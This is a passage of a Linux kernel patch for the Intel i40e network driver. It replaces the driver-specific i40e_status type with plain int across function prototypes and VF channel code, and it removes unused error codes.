+-i40e_status i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
+-				       bool dcb_enable,
+-				       struct i40e_asq_cmd_details
+-				       *cmd_details);
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
++			       bool dcb_enable,
++			       struct i40e_asq_cmd_details
++			       *cmd_details);
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
+ 			       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
+-				u16 seid, u16 credit, u8 max_bw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
+ 			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++int i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
++					u16 seid, u16 credit, u8 max_bw,
++					struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++			       u16 seid,
++			       struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++			       enum i40e_admin_queue_opc opcode,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+ 	u16 seid,
+ 	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+ 	struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
+-				   struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++				u16 seid,
++				struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++				struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				 u16 seid,
++				 struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				 struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_aqc_query_port_ets_config_resp *bw_data,
++			      struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++				    u16 seid,
++				    struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++				    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count);
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 vsi,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count);
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 vsi,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count);
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count);
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg);
+-enum i40e_status_code
++int i40e_read_lldp_cfg(struct i40e_hw *hw,
++		       struct i40e_lldp_variables *lldp_cfg);
++int
+ i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+ 			struct i40e_asq_cmd_details *cmd_details);
+ /* i40e_common */
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw);
+-i40e_status i40e_pf_reset(struct i40e_hw *hw);
++int i40e_init_shared_code(struct i40e_hw *hw);
++int i40e_pf_reset(struct i40e_hw *hw);
+ void i40e_clear_hw(struct i40e_hw *hw);
+ void i40e_clear_pxe_mode(struct i40e_hw *hw);
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
+-i40e_status i40e_update_link_info(struct i40e_hw *hw);
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw, bool *min_valid,
+-				      bool *max_valid);
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size);
+-i40e_status i40e_validate_mac_addr(u8 *mac_addr);
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
++int i40e_update_link_info(struct i40e_hw *hw);
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw, bool *min_valid,
++			      bool *max_valid);
++int
++i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++			       struct i40e_aqc_configure_partition_bw_data *bw_data,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
++			 u32 pba_num_size);
++int i40e_validate_mac_addr(u8 *mac_addr);
+ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable);
+ /* prototype for functions used for NVM access */
+-i40e_status i40e_init_nvm(struct i40e_hw *hw);
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				      enum i40e_aq_resource_access_type access);
++int i40e_init_nvm(struct i40e_hw *hw);
++int i40e_acquire_nvm(struct i40e_hw *hw,
++		     enum i40e_aq_resource_access_type access);
+ void i40e_release_nvm(struct i40e_hw *hw);
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-					 u16 *data);
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr);
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data);
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw);
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum);
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *);
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
++		       u16 *data);
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr);
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
++			 u16 *words, u16 *data);
++int i40e_update_nvm_checksum(struct i40e_hw *hw);
++int i40e_validate_nvm_checksum(struct i40e_hw *hw,
++			       u16 *checksum);
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *errno);
+ void i40e_nvmupd_check_wait_event(struct i40e_hw *hw, u16 opcode,
+ 				  struct i40e_aq_desc *desc);
+ void i40e_nvmupd_clear_wait_state(struct i40e_hw *hw);
+ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status);
+ 
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw);
++int i40e_set_mac_type(struct i40e_hw *hw);
+ 
+ extern struct i40e_rx_ptype_decoded i40e_ptype_lookup[];
+ 
+@@ -422,41 +427,41 @@ i40e_virtchnl_link_speed(enum i40e_aq_link_speed link_speed)
+ /* i40e_common for VF drivers*/
+ void i40e_vf_parse_hw_config(struct i40e_hw *hw,
+ 			     struct virtchnl_vf_resource *msg);
+-i40e_status i40e_vf_reset(struct i40e_hw *hw);
+-i40e_status i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
+-				enum virtchnl_ops v_opcode,
+-				i40e_status v_retval,
+-				u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings);
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_vf_reset(struct i40e_hw *hw);
++int i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
++			   enum virtchnl_ops v_opcode,
++			   int v_retval,
++			   u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings);
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details);
+ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 						    u16 vsi_seid);
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr);
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details);
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val);
+-enum i40e_status_code
++int
+ i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+ 			     u32 reg_addr, u32 reg_val,
+ 			     struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int
+ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+@@ -469,43 +474,43 @@ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ #define i40e_aq_get_phy_register(hw, ps, da, pc, ra, rv, cd)		\
+ 	i40e_aq_get_phy_register_ext(hw, ps, da, pc, false, 0, ra, rv, cd)
+ 
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				   u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				    u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			   u8 phy_addr, u16 *value);
++int i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			    u8 phy_addr, u16 value);
+ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
+-i40e_status i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-			      u16 buff_size, u32 track_id,
+-			      u32 *error_offset, u32 *error_info,
+-			      struct i40e_asq_cmd_details *
+-			      cmd_details);
+-i40e_status i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				 u16 buff_size, u8 flags,
+-				 struct i40e_asq_cmd_details *
+-				 cmd_details);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *
++		      cmd_details);
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *
++			 cmd_details);
+ struct i40e_generic_seg_header *
+ i40e_find_segment_in_package(u32 segment_type,
+ 			     struct i40e_package_header *pkg_header);
+ struct i40e_profile_section_header *
+ i40e_find_section_in_profile(u32 section_type,
+ 			     struct i40e_profile_segment *profile);
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
+ 		   u32 track_id);
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
+ 		      u32 track_id);
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_status.h b/drivers/net/ethernet/intel/i40e/i40e_status.h
+index db3714a65dc71..4d2782e76038b 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_status.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_status.h
+@@ -9,65 +9,30 @@ enum i40e_status_code {
+ 	I40E_SUCCESS				= 0,
+ 	I40E_ERR_NVM				= -1,
+ 	I40E_ERR_NVM_CHECKSUM			= -2,
+-	I40E_ERR_PHY				= -3,
+ 	I40E_ERR_CONFIG				= -4,
+ 	I40E_ERR_PARAM				= -5,
+-	I40E_ERR_MAC_TYPE			= -6,
+ 	I40E_ERR_UNKNOWN_PHY			= -7,
+-	I40E_ERR_LINK_SETUP			= -8,
+-	I40E_ERR_ADAPTER_STOPPED		= -9,
+ 	I40E_ERR_INVALID_MAC_ADDR		= -10,
+ 	I40E_ERR_DEVICE_NOT_SUPPORTED		= -11,
+-	I40E_ERR_PRIMARY_REQUESTS_PENDING	= -12,
+-	I40E_ERR_INVALID_LINK_SETTINGS		= -13,
+-	I40E_ERR_AUTONEG_NOT_COMPLETE		= -14,
+ 	I40E_ERR_RESET_FAILED			= -15,
+-	I40E_ERR_SWFW_SYNC			= -16,
+ 	I40E_ERR_NO_AVAILABLE_VSI		= -17,
+ 	I40E_ERR_NO_MEMORY			= -18,
+ 	I40E_ERR_BAD_PTR			= -19,
+-	I40E_ERR_RING_FULL			= -20,
+-	I40E_ERR_INVALID_PD_ID			= -21,
+-	I40E_ERR_INVALID_QP_ID			= -22,
+-	I40E_ERR_INVALID_CQ_ID			= -23,
+-	I40E_ERR_INVALID_CEQ_ID			= -24,
+-	I40E_ERR_INVALID_AEQ_ID			= -25,
+ 	I40E_ERR_INVALID_SIZE			= -26,
+-	I40E_ERR_INVALID_ARP_INDEX		= -27,
+-	I40E_ERR_INVALID_FPM_FUNC_ID		= -28,
+-	I40E_ERR_QP_INVALID_MSG_SIZE		= -29,
+-	I40E_ERR_QP_TOOMANY_WRS_POSTED		= -30,
+-	I40E_ERR_INVALID_FRAG_COUNT		= -31,
+ 	I40E_ERR_QUEUE_EMPTY			= -32,
+-	I40E_ERR_INVALID_ALIGNMENT		= -33,
+-	I40E_ERR_FLUSHED_QUEUE			= -34,
+-	I40E_ERR_INVALID_PUSH_PAGE_INDEX	= -35,
+-	I40E_ERR_INVALID_IMM_DATA_SIZE		= -36,
+ 	I40E_ERR_TIMEOUT			= -37,
+-	I40E_ERR_OPCODE_MISMATCH		= -38,
+-	I40E_ERR_CQP_COMPL_ERROR		= -39,
+-	I40E_ERR_INVALID_VF_ID			= -40,
+-	I40E_ERR_INVALID_HMCFN_ID		= -41,
+-	I40E_ERR_BACKING_PAGE_ERROR		= -42,
+-	I40E_ERR_NO_PBLCHUNKS_AVAILABLE		= -43,
+-	I40E_ERR_INVALID_PBLE_INDEX		= -44,
+ 	I40E_ERR_INVALID_SD_INDEX		= -45,
+ 	I40E_ERR_INVALID_PAGE_DESC_INDEX	= -46,
+ 	I40E_ERR_INVALID_SD_TYPE		= -47,
+-	I40E_ERR_MEMCPY_FAILED			= -48,
+ 	I40E_ERR_INVALID_HMC_OBJ_INDEX		= -49,
+ 	I40E_ERR_INVALID_HMC_OBJ_COUNT		= -50,
+-	I40E_ERR_INVALID_SRQ_ARM_LIMIT		= -51,
+-	I40E_ERR_SRQ_ENABLED			= -52,
+ 	I40E_ERR_ADMIN_QUEUE_ERROR		= -53,
+ 	I40E_ERR_ADMIN_QUEUE_TIMEOUT		= -54,
+ 	I40E_ERR_BUF_TOO_SHORT			= -55,
+ 	I40E_ERR_ADMIN_QUEUE_FULL		= -56,
+ 	I40E_ERR_ADMIN_QUEUE_NO_WORK		= -57,
+-	I40E_ERR_BAD_IWARP_CQE			= -58,
+ 	I40E_ERR_NVM_BLANK_MODE			= -59,
+ 	I40E_ERR_NOT_IMPLEMENTED		= -60,
+-	I40E_ERR_PE_DOORBELL_NOT_ENABLED	= -61,
+ 	I40E_ERR_DIAG_TEST_FAILED		= -62,
+ 	I40E_ERR_NOT_READY			= -63,
+ 	I40E_NOT_SUPPORTED			= -64,
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 635f93d603186..cb7cf672f6971 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -17,7 +17,7 @@
+  **/
+ static void i40e_vc_vf_broadcast(struct i40e_pf *pf,
+ 				 enum virtchnl_ops v_opcode,
+-				 i40e_status v_retval, u8 *msg,
++				 int v_retval, u8 *msg,
+ 				 u16 msglen)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+@@ -1246,13 +1246,13 @@ err:
+  * @vl: List of VLANs - apply filter for given VLANs
+  * @num_vlans: Number of elements in @vl
+  **/
+-static i40e_status
++static int
+ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 		     bool unicast_enable, s16 *vl, u16 num_vlans)
+ {
+-	i40e_status aq_ret, aq_tmp = 0;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
++	int aq_ret, aq_tmp = 0;
+ 	int i;
+ 
+ 	/* No VLAN to set promisc on, set on VSI */
+@@ -1264,9 +1264,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			return aq_ret;
+@@ -1280,9 +1280,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 		}
+ 
+@@ -1297,9 +1297,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1313,9 +1313,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1339,13 +1339,13 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+  * Called from the VF to configure the promiscuous mode of
+  * VF vsis and from the VF reset path to reset promiscuous mode.
+  **/
+-static i40e_status i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
+-						   u16 vsi_id,
+-						   bool allmulti,
+-						   bool alluni)
++static int i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
++					   u16 vsi_id,
++					   bool allmulti,
++					   bool alluni)
+ {
+-	i40e_status aq_ret = I40E_SUCCESS;
+ 	struct i40e_pf *pf = vf->pf;
++	int aq_ret = I40E_SUCCESS;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_vlans;
+ 	s16 *vl;
+@@ -1955,7 +1955,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	int abs_vf_id;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	/* validate the request */
+ 	if (!vf || vf->vf_id >= vf->pf->num_alloc_vfs)
+@@ -1987,7 +1987,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+  **/
+ static int i40e_vc_send_resp_to_vf(struct i40e_vf *vf,
+ 				   enum virtchnl_ops opcode,
+-				   i40e_status retval)
++				   int retval)
+ {
+ 	return i40e_vc_send_msg_to_vf(vf, opcode, retval, NULL, 0);
+ }
+@@ -2091,9 +2091,9 @@ static int i40e_vc_get_vf_resources_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_vf_resource *vfres = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 	int num_vsis = 1;
++	int aq_ret = 0;
+ 	size_t len = 0;
+ 	int ret;
+ 
+@@ -2221,9 +2221,9 @@ static int i40e_vc_config_promiscuous_mode_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_promisc_info *info =
+ 	    (struct virtchnl_promisc_info *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	bool allmulti = false;
+ 	bool alluni = false;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2308,10 +2308,10 @@ static int i40e_vc_config_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_pair_info *qpi;
+ 	u16 vsi_id, vsi_queue_id = 0;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	int i, j = 0, idx = 0;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_qps_all = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2458,8 +2458,8 @@ static int i40e_vc_config_irq_map_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_irq_map_info *irqmap_info =
+ 	    (struct virtchnl_irq_map_info *)msg;
+ 	struct virtchnl_vector_map *map;
++	int aq_ret = 0;
+ 	u16 vsi_id;
+-	i40e_status aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
